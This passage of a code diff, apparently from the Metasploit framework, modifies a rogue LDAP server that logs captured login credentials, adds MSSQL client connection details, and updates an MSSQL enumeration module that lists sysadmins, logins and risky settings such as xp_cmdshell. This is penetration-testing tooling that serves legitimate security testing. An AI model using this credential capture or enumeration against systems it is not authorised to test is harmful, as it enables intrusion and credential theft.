Net::LDAP::ResultCodeUnwillingToPerform,
|
||||
'',
|
||||
Net::LDAP::ResultStrings[Net::LDAP::ResultCodeUnwillingToPerform],
|
||||
Net::LDAP::PDU::SearchResult
|
||||
) end
|
||||
resp.nil? ? cli.close : send_response(cli, resp)
|
||||
wlog("LDAP request data remaining: #{data}") unless data.empty?
|
||||
|
||||
res = case pdu.app_tag
|
||||
when Net::LDAP::PDU::BindRequest
|
||||
user_login = pdu.bind_parameters
|
||||
server_creds = ''
|
||||
context_code = nil
|
||||
processed_pdu_data = @auth_provider.process_login_request(user_login).merge(processed_pdu_data)
|
||||
if processed_pdu_data[:result_code] == Net::LDAP::ResultCodeSaslBindInProgress
|
||||
server_creds = processed_pdu_data[:server_creds]
|
||||
context_code = 7
|
||||
else
|
||||
processed_pdu_data[:result_message] = "LDAP Login Attempt => From:#{processed_pdu_data[:ip]}:#{processed_pdu_data[:port]}\t Username:#{processed_pdu_data[:user]}\t #{processed_pdu_data[:private_type]}:#{processed_pdu_data[:private]}\t"
|
||||
processed_pdu_data[:result_message] += " Domain:#{processed_pdu_data[:domain]}" if processed_pdu_data[:domain]
|
||||
processed_pdu_data[:post_pdu] = true
|
||||
end
|
||||
processed_pdu_data[:pdu_type] = pdu.app_tag
|
||||
encode_ldap_response(
|
||||
pdu.message_id,
|
||||
processed_pdu_data[:result_code],
|
||||
'',
|
||||
Net::LDAP::ResultStrings[processed_pdu_data[:result_code]],
|
||||
Net::LDAP::PDU::BindResult,
|
||||
server_creds,
|
||||
context_code
|
||||
)
|
||||
when Net::LDAP::PDU::SearchRequest
|
||||
filter = Net::LDAP::Filter.parse_ldap_filter(pdu.search_parameters[:filter])
|
||||
attrs = pdu.search_parameters[:attributes].empty? ? :all : pdu.search_parameters[:attributes]
|
||||
res = search_result(filter, pdu.message_id, attrs)
|
||||
if res.nil? || res.empty?
|
||||
result_code = Net::LDAP::ResultCodeNoSuchObject
|
||||
else
|
||||
client.write(res)
|
||||
result_code = Net::LDAP::ResultCodeSuccess
|
||||
end
|
||||
processed_pdu_data[:pdu_type] = pdu.app_tag
|
||||
encode_ldap_response(
|
||||
pdu.message_id,
|
||||
result_code,
|
||||
'',
|
||||
Net::LDAP::ResultStrings[result_code],
|
||||
Net::LDAP::PDU::SearchResult
|
||||
)
|
||||
when Net::LDAP::PDU::UnbindRequest
|
||||
client.close
|
||||
nil
|
||||
else
|
||||
if suitable_response(pdu.app_tag)
|
||||
result_code = Net::LDAP::ResultCodeUnwillingToPerform
|
||||
encode_ldap_response(
|
||||
pdu.message_id,
|
||||
result_code,
|
||||
'',
|
||||
Net::LDAP::ResultStrings[result_code],
|
||||
suitable_response(pdu.app_tag)
|
||||
)
|
||||
else
|
||||
client.close
|
||||
end
|
||||
end
|
||||
|
||||
if @pdu_process[pdu.app_tag] && !processed_pdu_data.empty?
|
||||
@pdu_process[pdu.app_tag].call(processed_pdu_data)
|
||||
end
|
||||
send_response(client, res) unless res.nil?
|
||||
rescue StandardError => e
|
||||
elog(e)
|
||||
cli.close
|
||||
client.close
|
||||
raise e
|
||||
end
|
||||
end
|
||||
@@ -203,50 +244,84 @@ module Rex
|
||||
#
|
||||
# Encode response for LDAP client consumption
|
||||
#
|
||||
# @param msgid [Integer] LDAP message identifier
|
||||
# @param code [Integer] LDAP message code
|
||||
# @param dn [String] LDAP distinguished name
|
||||
# @param msg [String] LDAP response message
|
||||
# @param tag [Integer] LDAP response tag
|
||||
# @param msgid [Integer] LDAP message identifier
|
||||
# @param code [Integer] LDAP message code
|
||||
# @param dn [String] LDAP distinguished name
|
||||
# @param msg [String] LDAP response message
|
||||
# @param tag [Integer] LDAP response tag
|
||||
# @param context_data [String] Additional data to serialize in the sequence
|
||||
# @param context_code [Integer] Context Specific code related to `context_data`
|
||||
#
|
||||
# @return [Net::BER::BerIdentifiedOid] LDAP query response
|
||||
def encode_ldap_response(msgid, code, dn, msg, tag)
|
||||
def encode_ldap_response(msgid, code, dn, msg, tag, context_data = nil, context_code = nil)
|
||||
tag_sequence = [
|
||||
code.to_ber_enumerated,
|
||||
dn.to_ber,
|
||||
msg.to_ber
|
||||
]
|
||||
|
||||
if context_data && context_code
|
||||
tag_sequence << context_data.to_ber_contextspecific(context_code)
|
||||
end
|
||||
|
||||
[
|
||||
msgid.to_ber,
|
||||
[
|
||||
code.to_ber_enumerated,
|
||||
dn.to_ber,
|
||||
msg.to_ber
|
||||
].to_ber_appsequence(tag)
|
||||
tag_sequence.to_ber_appsequence(tag)
|
||||
].to_ber_sequence
|
||||
end
|
||||
|
||||
#
|
||||
# Search provided ldif data for query information
|
||||
# Search provided ldif data for query information. If no `ldif` was provided a random search result will be generated.
|
||||
#
|
||||
# @param filter [Net::LDAP::Filter] LDAP query filter
|
||||
# @param attrflt [Array, Symbol] LDAP attribute filter
|
||||
#
|
||||
# @return [Array] Query matches
|
||||
def search_ldif(filter, msgid, attrflt = :all)
|
||||
return [] if @ldif.nil? || @ldif.empty?
|
||||
|
||||
ldif.map do |dn, entry|
|
||||
next unless filter.match(entry)
|
||||
|
||||
def search_result(filter, msgid, attrflt = :all)
|
||||
if @ldif.nil? || @ldif.empty?
|
||||
attrs = []
|
||||
entry.each do |k, v|
|
||||
if attrflt == :all || attrflt.include?(k.downcase)
|
||||
attrvals = v.map(&:to_ber).to_ber_set
|
||||
attrs << [k.to_ber, attrvals].to_ber_sequence
|
||||
if attrflt.is_a?(Array)
|
||||
attrflt.each do |at|
|
||||
attrval = [Rex::Text.rand_text_alphanumeric(10)].map(&:to_ber).to_ber_set
|
||||
attrs << [at.to_ber, attrval].to_ber_sequence
|
||||
end
|
||||
dn = "dc=#{Rex::Text.rand_text_alphanumeric(10)},dc=#{Rex::Text.rand_text_alpha(4)}"
|
||||
appseq = [
|
||||
dn.to_ber,
|
||||
attrs.to_ber_sequence
|
||||
].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)
|
||||
[msgid.to_ber, appseq].to_ber_sequence
|
||||
end
|
||||
appseq = [
|
||||
dn.to_ber,
|
||||
attrs.to_ber_sequence
|
||||
].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)
|
||||
[msgid.to_ber, appseq].to_ber_sequence
|
||||
end.compact
|
||||
else
|
||||
ldif.map do |bind_dn, entry|
|
||||
next unless filter.match(entry)
|
||||
|
||||
attrs = []
|
||||
entry.each do |k, v|
|
||||
if attrflt == :all || attrflt.include?(k.downcase)
|
||||
attrvals = v.map(&:to_ber).to_ber_set
|
||||
attrs << [k.to_ber, attrvals].to_ber_sequence
|
||||
end
|
||||
end
|
||||
appseq = [
|
||||
bind_dn.to_ber,
|
||||
attrs.to_ber_sequence
|
||||
].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)
|
||||
[msgid.to_ber, appseq].to_ber_sequence
|
||||
end.compact.join
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Sets the tasks to be performed after processing of pdu object
|
||||
#
|
||||
# @param proc [Proc] block of code to execute
|
||||
#
|
||||
# @return pdu_process [Proc] steps to be executed
|
||||
def processed_pdu_handler(pdu_type, &proc)
|
||||
@pdu_process = []
|
||||
@pdu_process[pdu_type] = proc if block_given?
|
||||
end
|
||||
|
||||
#
|
||||
@@ -256,6 +331,27 @@ module Rex
|
||||
"#{args[0] || ''}-#{args[1] || ''}-#{args[4] || ''}"
|
||||
end
|
||||
|
||||
#
|
||||
# Get suitable response for a particular request
|
||||
#
|
||||
# @param request [Integer] Type of request
|
||||
#
|
||||
# @return response [Integer] Type of response
|
||||
def suitable_response(request)
|
||||
responses = {
|
||||
Net::LDAP::PDU::BindRequest => Net::LDAP::PDU::BindResult,
|
||||
Net::LDAP::PDU::SearchRequest => Net::LDAP::PDU::SearchResult,
|
||||
Net::LDAP::PDU::ModifyRequest => Net::LDAP::PDU::ModifyResponse,
|
||||
Net::LDAP::PDU::AddRequest => Net::LDAP::PDU::AddResponse,
|
||||
Net::LDAP::PDU::DeleteRequest => Net::LDAP::PDU::DeleteResponse,
|
||||
Net::LDAP::PDU::ModifyRDNRequest => Net::LDAP::PDU::ModifyRDNResponse,
|
||||
Net::LDAP::PDU::CompareRequest => Net::LDAP::PDU::CompareResponse,
|
||||
Net::LDAP::PDU::ExtendedRequest => Net::LDAP::PDU::ExtendedResponse
|
||||
}
|
||||
|
||||
responses[request]
|
||||
end
|
||||
|
||||
#
|
||||
# LDAP server.
|
||||
#
|
||||
@@ -299,7 +395,7 @@ module Rex
|
||||
|
||||
dispatch_request(cli, data)
|
||||
rescue EOFError => e
|
||||
tcp_socket.close_client(cli) if cli
|
||||
tcp_sock.close_client(cli) if cli
|
||||
raise e
|
||||
end
|
||||
|
||||
|
||||
@@ -42,8 +42,12 @@ module Rex
|
||||
# @!attribute send_delay
|
||||
# @return [Integer] The delay between sending packets
|
||||
attr_accessor :send_delay
|
||||
# @!attribute initial_connection_info
|
||||
# @return [Hash] Key-value pairs received from the server during the initial MSSQL connection.
|
||||
# See the spec here: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tds/b46a581a-39de-4745-b076-ec4dbb7d13ec
|
||||
attr_accessor :initial_connection_info
|
||||
|
||||
def initialize(framework_module, framework, rhost, rport = 1433)
|
||||
def initialize(framework_module, framework, rhost, rport = 1433, proxies = nil)
|
||||
@framework_module = framework_module
|
||||
@framework = framework
|
||||
@connection_timeout = framework_module.datastore['ConnectTimeout'] || 30
|
||||
@@ -60,6 +64,7 @@ module Rex
|
||||
@domain_controller_rhost = framework_module.datastore['DomainControllerRhost'] || ''
|
||||
@rhost = rhost
|
||||
@rport = rport
|
||||
@proxies = proxies
|
||||
end
|
||||
|
||||
#
|
||||
@@ -175,6 +180,7 @@ module Rex
|
||||
|
||||
info = {:errors => []}
|
||||
info = mssql_parse_reply(resp, info)
|
||||
self.initial_connection_info = info
|
||||
|
||||
return false if not info
|
||||
return info[:login_ack] ? true : false
|
||||
@@ -406,6 +412,7 @@ module Rex
|
||||
|
||||
info = {:errors => []}
|
||||
info = mssql_parse_reply(resp, info)
|
||||
self.initial_connection_info = info
|
||||
|
||||
return false if not info
|
||||
info[:login_ack] ? true : false
|
||||
@@ -640,6 +647,25 @@ module Rex
|
||||
print_status("Be sure to cleanup #{var_payload}.exe...")
|
||||
end
|
||||
|
||||
# @param [ENVCHANGE] envchange The ENVCHANGE type to get the information for.
|
||||
# @return [Hash] Returns a hash of values if the provided type exists.
|
||||
# @return [Hash] Returns the whole connection info if envchange is nil.
|
||||
# @return [Hash] Returns an empty hash if the provided type is not present.
|
||||
def initial_info_for_envchange(envchange: nil)
|
||||
return self.initial_connection_info if envchange.nil?
|
||||
return nil unless (self.initial_connection_info && self.initial_connection_info.is_a?(::Hash))
|
||||
|
||||
self.initial_connection_info[:envs]&.select { |hash| hash[:type] == envchange }&.first || {}
|
||||
end
|
||||
|
||||
def address
|
||||
rhost
|
||||
end
|
||||
|
||||
def port
|
||||
rport
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
def rhost
|
||||
|
||||
@@ -32,6 +32,30 @@ module ClientMixin
|
||||
STATUS_RESETCONNECTION = 0x08 # TDS 7.1+
|
||||
STATUS_RESETCONNECTIONSKIPTRAN = 0x10 # TDS 7.3+
|
||||
|
||||
# Mappings for ENVCHANGE types
|
||||
# See the TDS Specification here: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tds/2b3eb7e5-d43d-4d1b-bf4d-76b9e3afc791
|
||||
module ENVCHANGE
|
||||
DATABASE = 1
|
||||
LANGUAGE = 2
|
||||
CHARACTER_SET = 3
|
||||
PACKET_SIZE = 4
|
||||
UNICODE_LOCAL_ID = 5
|
||||
UNICODE_COMPARISON_FLAGS = 6
|
||||
SQL_COLLATION = 7
|
||||
BEGIN_TRANSACTION = 8
|
||||
COMMIT_TRANSACTION = 9
|
||||
ROLLBACK_TRANSACTION = 10
|
||||
ENLIST_DTC_TRANSACTION = 11
|
||||
DEFECT_TRANSACTION = 12
|
||||
REAL_TIME_LOG_SHIPPING = 13
|
||||
PROMOTE_TRANSACTION = 15
|
||||
TRANSACTION_MANAGER_ADDRESS = 16
|
||||
TRANSACTION_ENDED = 17
|
||||
COMPLETION_ACKNOWLEDGEMENT = 18
|
||||
NAME_OF_USER_INSTANCE = 19
|
||||
ROUTING_INFORMATION = 20
|
||||
end
|
||||
|
||||
def mssql_print_reply(info)
|
||||
print_status("SQL Query: #{info[:sql]}")
|
||||
|
||||
@@ -49,7 +73,7 @@ module ClientMixin
|
||||
|
||||
tbl = Rex::Text::Table.new(
|
||||
'Indent' => 1,
|
||||
'Header' => "",
|
||||
'Header' => "Response",
|
||||
'Columns' => info[:colnames],
|
||||
'SortIndex' => -1
|
||||
)
|
||||
|
||||
@@ -588,7 +588,15 @@ module DispatcherShell
|
||||
# If the command is unknown...
|
||||
#
|
||||
def unknown_command(method, line)
|
||||
print_error("Unknown command: #{method}")
|
||||
# Map each dispatchers commands to valid_commands
|
||||
valid_commands = dispatcher_stack.flat_map { |dispatcher| dispatcher.commands.keys }
|
||||
|
||||
message = "Unknown command: #{method}."
|
||||
suggestion = DidYouMean::SpellChecker.new(dictionary: valid_commands).correct(method).first
|
||||
message << " Did you mean %grn#{suggestion}%clr?" if suggestion
|
||||
message << ' Run the %grnhelp%clr command for more details.'
|
||||
|
||||
print_error(message)
|
||||
end
|
||||
|
||||
#
|
||||
|
||||
@@ -72,7 +72,7 @@ Gem::Specification.new do |spec|
|
||||
# are needed when there's no database
|
||||
spec.add_runtime_dependency 'metasploit-model'
|
||||
# Needed for Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '2.0.165'
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '2.0.166'
|
||||
# Needed for the next-generation POSIX Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.26'
|
||||
# Needed by msfgui and other rpc components
|
||||
|
||||
@@ -6,6 +6,7 @@
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::OptionalSession::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
@@ -23,11 +24,14 @@ class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
print_status("Running MS SQL Server Enumeration...")
|
||||
|
||||
if !mssql_login_datastore
|
||||
print_error("Login was unsuccessful. Check your credentials.")
|
||||
disconnect
|
||||
return
|
||||
if session
|
||||
set_session(session.client)
|
||||
else
|
||||
unless mssql_login_datastore
|
||||
print_error("Login was unsuccessful. Check your credentials.")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
# Get Version
|
||||
@@ -39,9 +43,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||
print "[*]\t#{row}"
|
||||
end
|
||||
vernum = sqlversion.gsub("\n"," ").scan(/SQL Server\s*(200\d)/m)
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Version: #{sqlversion}")
|
||||
|
||||
@@ -71,16 +75,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
# checking for C2 Audit Mode
|
||||
if sysconfig['c2 audit mode'] == 1
|
||||
print_status("\tC2 Audit Mode is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "C2 Audit Mode is Enabled")
|
||||
else
|
||||
print_status("\tC2 Audit Mode is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "C2 Audit Mode is Not Enabled")
|
||||
end
|
||||
@@ -90,16 +94,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if vernum.join != "2000"
|
||||
if sysconfig['xp_cmdshell'] == 1
|
||||
print_status("\txp_cmdshell is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "xp_cmdshell is Enabled")
|
||||
else
|
||||
print_status("\txp_cmdshell is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "xp_cmdshell is Not Enabled")
|
||||
end
|
||||
@@ -107,16 +111,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
xpspexist = mssql_query("select sysobjects.name from sysobjects where name = \'xp_cmdshell\'")[:rows]
|
||||
if xpspexist != nil
|
||||
print_status("\txp_cmdshell is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "xp_cmdshell is Enabled")
|
||||
else
|
||||
print_status("\txp_cmdshell is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "xp_cmdshell is Not Enabled")
|
||||
end
|
||||
@@ -126,16 +130,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
# check if remote access is enabled
|
||||
if sysconfig['remote access'] == 1
|
||||
print_status("\tremote access is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "remote access is Enabled")
|
||||
else
|
||||
print_status("\tremote access is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "remote access is not Enabled")
|
||||
end
|
||||
@@ -144,16 +148,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
#check if updates are allowed
|
||||
if sysconfig['allow updates'] == 1
|
||||
print_status("\tallow updates is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "allow updates is Enabled")
|
||||
else
|
||||
print_status("\tallow updates is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "allow updates is not Enabled")
|
||||
end
|
||||
@@ -163,16 +167,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if vernum.join != "2000"
|
||||
if sysconfig['Database Mail XPs'] == 1
|
||||
print_status("\tDatabase Mail XPs is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database Mail XPs is Enabled")
|
||||
else
|
||||
print_status("\tDatabase Mail XPs is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database Mail XPs is not Enabled")
|
||||
end
|
||||
@@ -180,16 +184,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
mailexist = mssql_query("select sysobjects.name from sysobjects where name like \'%mail%\'")[:rows]
|
||||
if mailexist != nil
|
||||
print_status("\tDatabase Mail XPs is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database Mail XPs is Enabled")
|
||||
else
|
||||
print_status("\tDatabase Mail XPs is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database Mail XPs is not Enabled")
|
||||
end
|
||||
@@ -200,16 +204,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if vernum.join != "2000"
|
||||
if sysconfig['Ole Automation Procedures'] == 1
|
||||
print_status("\tOle Automation Procedures are Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Ole Automation Procedures are Enabled")
|
||||
else
|
||||
print_status("\tOle Automation Procedures are Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Ole Automation Procedures are not Enabled")
|
||||
end
|
||||
@@ -217,16 +221,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
oleexist = mssql_query("select sysobjects.name from sysobjects where name like \'%sp_OA%\'")[:rows]
|
||||
if oleexist != nil
|
||||
print_status("\tOle Automation Procedures is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Ole Automation Procedures are Enabled")
|
||||
else
|
||||
print_status("\tOle Automation Procedures are Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Ole Automation Procedures are not Enabled")
|
||||
end
|
||||
@@ -245,9 +249,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if db_ind_files != nil
|
||||
db_ind_files.each do |fn|
|
||||
print_status("\t\t#{fn.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database: #{dbn.strip} File: #{fn.join}")
|
||||
end
|
||||
@@ -257,9 +261,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if db_ind_files != nil
|
||||
db_ind_files.each do |fn|
|
||||
print_status("\t\t#{fn.join.strip}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database: #{dbn.strip} File: #{fn.join}")
|
||||
end
|
||||
@@ -279,17 +283,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if syslogins != nil
|
||||
syslogins.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database: Master User: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_error("\tCould not enumerate System Logins!")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Could not enumerate System Logins")
|
||||
end
|
||||
@@ -302,17 +306,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if disabledsyslogins != nil
|
||||
disabledsyslogins.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Disabled User: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_status("\tNo Disabled Logins Found")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "No Disabled Logins Found")
|
||||
end
|
||||
@@ -326,17 +330,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if nopolicysyslogins != nil
|
||||
nopolicysyslogins.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "None Policy Checked User: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_status("\tAll System Accounts have the Windows Account Policy Applied to them.")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "All System Accounts have the Windows Account Policy Applied to them")
|
||||
end
|
||||
@@ -350,17 +354,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if passexsyslogins != nil
|
||||
passexsyslogins.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "None Password Expiration User: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_status("\tAll System Accounts are checked for Password Expiration.")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "All System Accounts are checked for Password Expiration")
|
||||
end
|
||||
@@ -377,17 +381,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if sysadmins != nil
|
||||
sysadmins.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Sysdba: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_error("\tCould not enumerate sysadmin accounts!")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Could not enumerate sysadmin accounts")
|
||||
end
|
||||
@@ -404,17 +408,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if winusers != nil
|
||||
winusers.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Windows Logins: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_status("\tNo Windows logins found!")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "No Windows logins found")
|
||||
end
|
||||
@@ -431,17 +435,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if wingroups != nil
|
||||
wingroups.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Windows Groups: #{acc.join}")
|
||||
end
|
